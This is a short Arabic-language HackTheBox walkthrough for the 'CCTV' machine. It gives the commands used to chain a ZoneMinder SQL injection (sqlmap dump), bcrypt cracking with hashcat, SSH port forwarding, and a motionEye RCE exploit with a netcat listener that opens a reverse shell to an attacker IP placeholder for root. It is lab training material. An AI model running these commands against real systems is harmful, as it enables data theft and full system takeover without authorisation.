
HackTheBox CCTV walkthrough يربط بين CVE-2024-51482 ZoneMinder SQL injection، وكسر bcrypt hash، وCVE-2025-60787 motionEye RCE للحصول على root.
المنصة: HackTheBox | نظام التشغيل: Linux
حقن SQL في ZoneMinder عبر CVE-2024-51482 يستخرج تجزئة bcrypt من قاعدة البيانات. كسرها باستخدام hashcat يمنح وصول SSH. نسخة motionEye الداخلية المكشوفة عبر إعادة توجيه المنافذ معرّضة لـ CVE-2025-60787 — تمنح صدفة root.
nmap -sV -sC 10.129.53.160 -Pn
22/tcp open ssh OpenSSH 9.6p1 (Ubuntu)
80/tcp open http Apache 2.4.58 — SecureVision CCTV & Security Solutions
تمت إضافة cctv.htb إلى /etc/hosts. استضاف المنفذ 80 تثبيت ZoneMinder.
CVE-2024-51482 هو ثغرة حقن SQL في نقطة نهاية تسجيل الدخول في ZoneMinder. معامل اسم المستخدم غير مُعقّم، مما يسمح باستخراج قاعدة البيانات.
sqlmap -u "http://cctv.htb/zm/index.php" \
--data="username=admin&password=admin&action=login" \
--dbms=mysql --dump --batch
تم استخراج تجزئة كلمة مرور bcrypt من جدول المستخدمين.
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
تم كسر كلمة المرور.
ssh <user>@10.129.53.160
تم استرجاع علم المستخدم. تم التحقق من الخدمات الداخلية.
ss -tlnp
# 127.0.0.1:8765 — motionEye CCTV management panel
تم إعادة توجيه المنفذ.
ssh -L 8765:127.0.0.1:8765 <user>@10.129.53.160
CVE-2025-60787 هو تنفيذ أوامر عن بُعد مُصادق عليه في motionEye. مع الوصول إلى اللوحة الداخلية، تُنفَّذ أوامر عشوائية بصلاحيات root.
nc -lvnp 4444
python3 exploit_CVE-2025-60787.py --url http://127.0.0.1:8765 --lhost <ATTACKER_IP> --lport 4444
تم الحصول على صدفة root. علم root في /root/root.txt.
لأغراض تعليمية فقط. اختبر فقط الأنظمة التي تملكها أو لديك إذن صريح باختبارها.